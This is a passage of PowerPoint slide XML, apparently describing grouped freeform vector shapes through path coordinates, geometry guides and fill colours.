                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{428FD508-B060-405B-9FA8-26C48F41F7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888" y="2464"/>
                    <a:ext cx="45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3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20" name="Freeform 1842">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{220326F1-5398-45F3-B73F-9F8F1A6A33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038" y="2694"/>
                    <a:ext cx="46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4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4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21" name="Freeform 1843">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E91E75F-C91A-41F6-B5B4-09F2FE12F8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084" y="2694"/>
                    <a:ext cx="42" cy="322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4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22" name="Freeform 1844">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C17E1E7F-53E4-4603-BAC9-77C7754C15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786" y="2625"/>
                    <a:ext cx="45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3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23" name="Freeform 1845">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDE4EDD-4CAE-47D2-82E3-EDD53B399C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831" y="2625"/>
                    <a:ext cx="43" cy="322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24" name="Freeform 1846">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3341B1ED-B502-4E02-B55B-25F44F4F0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633" y="2382"/>
                    <a:ext cx="42" cy="325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25" name="Freeform 1847">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09AA4CB9-5220-4F8B-97C6-22F617D9FC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633" y="2394"/>
                    <a:ext cx="42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4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4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26" name="Freeform 1848">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA31AEE-C959-4755-AC0F-C5B44AE0E1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675" y="2394"/>
                    <a:ext cx="46" cy="322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4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27" name="Freeform 1849">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C156A98-6C8D-4C25-97BD-63EDD195EA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786" y="2382"/>
                    <a:ext cx="1190" cy="325"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 321"/>
                      <a:gd name="T1" fmla="*/ 65 h 87"/>
                      <a:gd name="T2" fmla="*/ 160 w 321"/>
                      <a:gd name="T3" fmla="*/ 22 h 87"/>
                      <a:gd name="T4" fmla="*/ 160 w 321"/>
                      <a:gd name="T5" fmla="*/ 22 h 87"/>
                      <a:gd name="T6" fmla="*/ 240 w 321"/>
                      <a:gd name="T7" fmla="*/ 0 h 87"/>
                      <a:gd name="T8" fmla="*/ 321 w 321"/>
                      <a:gd name="T9" fmla="*/ 22 h 87"/>
                      <a:gd name="T10" fmla="*/ 240 w 321"/>
                      <a:gd name="T11" fmla="*/ 44 h 87"/>
                      <a:gd name="T12" fmla="*/ 240 w 321"/>
                      <a:gd name="T13" fmla="*/ 44 h 87"/>
                      <a:gd name="T14" fmla="*/ 81 w 321"/>
                      <a:gd name="T15" fmla="*/ 87 h 87"/>
                      <a:gd name="T16" fmla="*/ 0 w 321"/>
                      <a:gd name="T17" fmla="*/ 65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21" h="87">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="321" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="87"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="8E47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28" name="Freeform 1850">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5740A0C0-1BBD-4D8B-9125-B5797D3869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084" y="2464"/>
                    <a:ext cx="892" cy="285"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 241"/>
                      <a:gd name="T1" fmla="*/ 65 h 77"/>
                      <a:gd name="T2" fmla="*/ 0 w 241"/>
                      <a:gd name="T3" fmla="*/ 77 h 77"/>
                      <a:gd name="T4" fmla="*/ 241 w 241"/>
                      <a:gd name="T5" fmla="*/ 12 h 77"/>
                      <a:gd name="T6" fmla="*/ 241 w 241"/>
                      <a:gd name="T7" fmla="*/ 0 h 77"/>
                      <a:gd name="T8" fmla="*/ 0 w 241"/>
                      <a:gd name="T9" fmla="*/ 65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1" h="77">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="77"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="12"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65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29" name="Freeform 1851">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A688DA52-8A7B-4A8E-ACD2-5C5FD0415F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786" y="2625"/>
                    <a:ext cx="298" cy="124"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 80"/>
                      <a:gd name="T1" fmla="*/ 0 h 34"/>
                      <a:gd name="T2" fmla="*/ 0 w 80"/>
                      <a:gd name="T3" fmla="*/ 13 h 34"/>
                      <a:gd name="T4" fmla="*/ 80 w 80"/>
                      <a:gd name="T5" fmla="*/ 34 h 34"/>
                      <a:gd name="T6" fmla="*/ 80 w 80"/>
                      <a:gd name="T7" fmla="*/ 22 h 34"/>
                      <a:gd name="T8" fmla="*/ 0 w 80"/>
                      <a:gd name="T9" fmla="*/ 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0" h="34">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="13"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="34"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="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003" name="Group 1852">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CB448AB-10D6-4DBB-A2B2-55098120766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1516" y="2299"/>
                  <a:ext cx="134" cy="103"/>
                  <a:chOff x="2155" y="1811"/>
                  <a:chExt cx="675" cy="523"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2010" name="Freeform 1853">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE3C9CA0-6491-46E7-B75A-65396FD1F0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490" y="1818"/>
                    <a:ext cx="314" cy="433"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 4460"/>
                      <a:gd name="T1" fmla="*/ 0 h 6160"/>
                      <a:gd name="T2" fmla="*/ 0 w 4460"/>
                      <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                      <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                      <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                      <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                      <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                      <a:gd name="T8" fmla="*/ 0 w 4460"/>
                      <a:gd name="T9" fmla="*/ 0 h 61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460" h="6160">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="4972"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4460" y="6160"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4460" y="118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969696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11" name="Freeform 1854">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30EC6979-CC0C-4BD3-BF21-61BB5EBC65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513" y="1850"/>
                    <a:ext cx="268" cy="332"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 3803"/>
                      <a:gd name="T1" fmla="*/ 0 h 4725"/>
                      <a:gd name="T2" fmla="*/ 0 w 3803"/>
                      <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                      <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                      <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                      <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                      <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                      <a:gd name="T8" fmla="*/ 0 w 3803"/>
                      <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="3711"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3803" y="4725"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3803" y="101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12" name="Freeform 1855">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DA63E-F1D6-4069-880F-AB0C9E726A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490" y="1811"/>
                    <a:ext cx="340" cy="90"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                      <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                      <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                      <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                      <a:gd name="T4" fmla="*/ 0 w 4831"/>
                      <a:gd name="T5" fmla="*/ 100 h 1288"/>
                      <a:gd name="T6" fmla="*/ 368 w 4831"/>
                      <a:gd name="T7" fmla="*/ 0 h 1288"/>
                      <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                      <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                        <a:moveTo>
                          <a:pt x="4831" y="1189"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4460" y="1288"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="100"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="368" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4831" y="1189"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="B2B2B2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13" name="Freeform 1856">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03D5C60C-6D9B-43DF-B235-790F45E1F2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155" y="2127"/>
                    <a:ext cx="675" cy="181"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 9603"/>
                      <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                      <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                      <a:gd name="T3" fmla="*/ 0 h 2577"/>
                      <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                      <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                      <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                      <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                      <a:gd name="T8" fmla="*/ 0 w 9603"/>
                      <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                        <a:moveTo>
                          <a:pt x="0" y="1287"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4802" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="9603" y="1287"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="2577"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1287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969696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14" name="Freeform 1857">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{143BFD50-7AB2-4A73-8DB4-CF1FEE8218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493" y="2218"/>
                    <a:ext cx="337" cy="116"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 4801"/>
                      <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                      <a:gd name="T2" fmla="*/ 0 w 4801"/>
                      <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                      <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                      <a:gd name="T5" fmla="*/ 369 h 1656"/>
                      <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                      <a:gd name="T7" fmla="*/ 0 h 1656"/>
                      <a:gd name="T8" fmla="*/ 0 w 4801"/>
                      <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                        <a:moveTo>
                          <a:pt x="0" y="1290"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="1656"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4801" y="369"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4801" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1290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C0C0C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15" name="Freeform 1858">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9104CEDC-9829-4716-865A-7D6A977E28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155" y="2218"/>
                    <a:ext cx="338" cy="116"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                      <a:gd name="T2" fmla="*/ 0 w 4802"/>
                      <a:gd name="T3" fmla="*/ 369 h 1656"/>
                      <a:gd name="T4" fmla="*/ 0 w 4802"/>
                      <a:gd name="T5" fmla="*/ 0 h 1656"/>
                      <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                      <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                        <a:moveTo>
                          <a:pt x="4802" y="1656"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="369"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="1290"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="1656"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="B2B2B2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16" name="Freeform 1859">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71BFEEA-CDAE-46E6-BFF2-A6CD3EC9C7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251" y="2157"/>
                    <a:ext cx="457" cy="122"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 6492"/>
                      <a:gd name="T1" fmla="*/ 654 h 1743"/>
                      <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                      <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                      <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                      <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                      <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                      <a:gd name="T7" fmla="*/ 0 h 1743"/>
                      <a:gd name="T8" fmla="*/ 0 w 6492"/>
                      <a:gd name="T9" fmla="*/ 654 h 17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492" h="1743">
                        <a:moveTo>
                          <a:pt x="0" y="654"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4061" y="1743"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="6492" y="1091"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="2431" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="654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C0C0C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17" name="Freeform 1860">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FD6B69B-0628-4307-B240-ACEA993837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804" y="1894"/>
                    <a:ext cx="26" cy="357"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 371"/>
                      <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                      <a:gd name="T2" fmla="*/ 371 w 371"/>
                      <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                      <a:gd name="T4" fmla="*/ 371 w 371"/>
                      <a:gd name="T5" fmla="*/ 0 h 5071"/>
                      <a:gd name="T6" fmla="*/ 0 w 371"/>
                      <a:gd name="T7" fmla="*/ 99 h 5071"/>
                      <a:gd name="T8" fmla="*/ 0 w 371"/>
                      <a:gd name="T9" fmla="*/ 5071 h 50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71" h="5071">
                        <a:moveTo>
                          <a:pt x="0" y="5071"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="371" y="4972"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="371" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="99"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="5071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C0C0C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004" name="Group 1861">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4235056-66CD-47D0-B310-D6C8E4F2D82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1601" y="2294"/>
                  <a:ext cx="155" cy="241"/>
                  <a:chOff x="2363" y="1132"/>
                  <a:chExt cx="343" cy="529"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2005" name="Freeform 1862">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCF602DE-5C2D-492A-BB38-4FB681C483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474" y="1449"/>
                    <a:ext cx="145" cy="189"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 108 w 108"/>
                      <a:gd name="T1" fmla="*/ 36 h 140"/>
                      <a:gd name="T2" fmla="*/ 108 w 108"/>
                      <a:gd name="T3" fmla="*/ 35 h 140"/>
                      <a:gd name="T4" fmla="*/ 108 w 108"/>
                      <a:gd name="T5" fmla="*/ 28 h 140"/>
                      <a:gd name="T6" fmla="*/ 108 w 108"/>
                      <a:gd name="T7" fmla="*/ 23 h 140"/>
                      <a:gd name="T8" fmla="*/ 108 w 108"/>
                      <a:gd name="T9" fmla="*/ 22 h 140"/>
                      <a:gd name="T10" fmla="*/ 108 w 108"/>
                      <a:gd name="T11" fmla="*/ 17 h 140"/>
                      <a:gd name="T12" fmla="*/ 108 w 108"/>
                      <a:gd name="T13" fmla="*/ 16 h 140"/>
                      <a:gd name="T14" fmla="*/ 108 w 108"/>
                      <a:gd name="T15" fmla="*/ 16 h 140"/>
                      <a:gd name="T16" fmla="*/ 89 w 108"/>
                      <a:gd name="T17" fmla="*/ 7 h 140"/>
                      <a:gd name="T18" fmla="*/ 64 w 108"/>
                      <a:gd name="T19" fmla="*/ 2 h 140"/>
                      <a:gd name="T20" fmla="*/ 57 w 108"/>
                      <a:gd name="T21" fmla="*/ 4 h 140"/>
                      <a:gd name="T22" fmla="*/ 49 w 108"/>
                      <a:gd name="T23" fmla="*/ 6 h 140"/>
                      <a:gd name="T24" fmla="*/ 49 w 108"/>
                      <a:gd name="T25" fmla="*/ 6 h 140"/>
                      <a:gd name="T26" fmla="*/ 0 w 108"/>
                      <a:gd name="T27" fmla="*/ 18 h 140"/>
                      <a:gd name="T28" fmla="*/ 29 w 108"/>
                      <a:gd name="T29" fmla="*/ 47 h 140"/>
                      <a:gd name="T30" fmla="*/ 62 w 108"/>
                      <a:gd name="T31" fmla="*/ 40 h 140"/>
                      <a:gd name="T32" fmla="*/ 62 w 108"/>
                      <a:gd name="T33" fmla="*/ 118 h 140"/>
                      <a:gd name="T34" fmla="*/ 101 w 108"/>
                      <a:gd name="T35" fmla="*/ 129 h 140"/>
                      <a:gd name="T36" fmla="*/ 108 w 108"/>
                      <a:gd name="T37" fmla="*/ 117 h 140"/>
                      <a:gd name="T38" fmla="*/ 108 w 108"/>
                      <a:gd name="T39" fmla="*/ 36 h 1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08" h="140">
                        <a:moveTo>
                          <a:pt x="108" y="36"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="33"/>
                          <a:pt x="108" y="30"/>
                          <a:pt x="108" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="28"/>
                          <a:pt x="108" y="26"/>
                          <a:pt x="108" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="23"/>
                          <a:pt x="108" y="22"/>
                          <a:pt x="108" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="21"/>
                          <a:pt x="108" y="19"/>
                          <a:pt x="108" y="17"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="4"/>
                          <a:pt x="95" y="8"/>
                          <a:pt x="89" y="7"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="6"/>
                          <a:pt x="73" y="0"/>
                          <a:pt x="64" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="3"/>
                          <a:pt x="57" y="4"/>
                          <a:pt x="57" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="67"/>
                          <a:pt x="62" y="109"/>
                          <a:pt x="62" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="63" y="138"/>
                          <a:pt x="89" y="140"/>
                          <a:pt x="101" y="129"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="126"/>
                          <a:pt x="108" y="122"/>
                          <a:pt x="108" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="101"/>
                          <a:pt x="107" y="69"/>
                          <a:pt x="108" y="3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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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06" name="Freeform 1863">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4CE6CD8-F677-4E88-BF53-9A9DECAEF7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418" y="1435"/>
                    <a:ext cx="267" cy="226"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 196 w 197"/>
                      <a:gd name="T1" fmla="*/ 44 h 167"/>
                      <a:gd name="T2" fmla="*/ 196 w 197"/>
                      <a:gd name="T3" fmla="*/ 37 h 167"/>
                      <a:gd name="T4" fmla="*/ 177 w 197"/>
                      <a:gd name="T5" fmla="*/ 18 h 167"/>
                      <a:gd name="T6" fmla="*/ 137 w 197"/>
                      <a:gd name="T7" fmla="*/ 25 h 167"/>
                      <a:gd name="T8" fmla="*/ 99 w 197"/>
                      <a:gd name="T9" fmla="*/ 35 h 167"/>
                      <a:gd name="T10" fmla="*/ 99 w 197"/>
                      <a:gd name="T11" fmla="*/ 52 h 167"/>
                      <a:gd name="T12" fmla="*/ 99 w 197"/>
                      <a:gd name="T13" fmla="*/ 35 h 167"/>
                      <a:gd name="T14" fmla="*/ 99 w 197"/>
                      <a:gd name="T15" fmla="*/ 35 h 167"/>
                      <a:gd name="T16" fmla="*/ 99 w 197"/>
                      <a:gd name="T17" fmla="*/ 2 h 167"/>
                      <a:gd name="T18" fmla="*/ 89 w 197"/>
                      <a:gd name="T19" fmla="*/ 14 h 167"/>
                      <a:gd name="T20" fmla="*/ 2 w 197"/>
                      <a:gd name="T21" fmla="*/ 8 h 167"/>
                      <a:gd name="T22" fmla="*/ 2 w 197"/>
                      <a:gd name="T23" fmla="*/ 10 h 167"/>
                      <a:gd name="T24" fmla="*/ 2 w 197"/>
                      <a:gd name="T25" fmla="*/ 31 h 167"/>
                      <a:gd name="T26" fmla="*/ 12 w 197"/>
                      <a:gd name="T27" fmla="*/ 67 h 167"/>
                      <a:gd name="T28" fmla="*/ 70 w 197"/>
                      <a:gd name="T29" fmla="*/ 83 h 167"/>
                      <a:gd name="T30" fmla="*/ 83 w 197"/>
                      <a:gd name="T31" fmla="*/ 82 h 167"/>
                      <a:gd name="T32" fmla="*/ 149 w 197"/>
                      <a:gd name="T33" fmla="*/ 65 h 167"/>
                      <a:gd name="T34" fmla="*/ 150 w 197"/>
                      <a:gd name="T35" fmla="*/ 137 h 167"/>
                      <a:gd name="T36" fmla="*/ 150 w 197"/>
                      <a:gd name="T37" fmla="*/ 141 h 167"/>
                      <a:gd name="T38" fmla="*/ 197 w 197"/>
                      <a:gd name="T39" fmla="*/ 140 h 167"/>
                      <a:gd name="T40" fmla="*/ 196 w 197"/>
                      <a:gd name="T41" fmla="*/ 44 h 1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97" h="167">
                        <a:moveTo>
                          <a:pt x="196" y="44"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="44"/>
                          <a:pt x="196" y="40"/>
                          <a:pt x="196" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="193" y="23"/>
                          <a:pt x="183" y="19"/>
                          <a:pt x="177" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="168" y="17"/>
                          <a:pt x="137" y="25"/>
                          <a:pt x="137" y="25"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
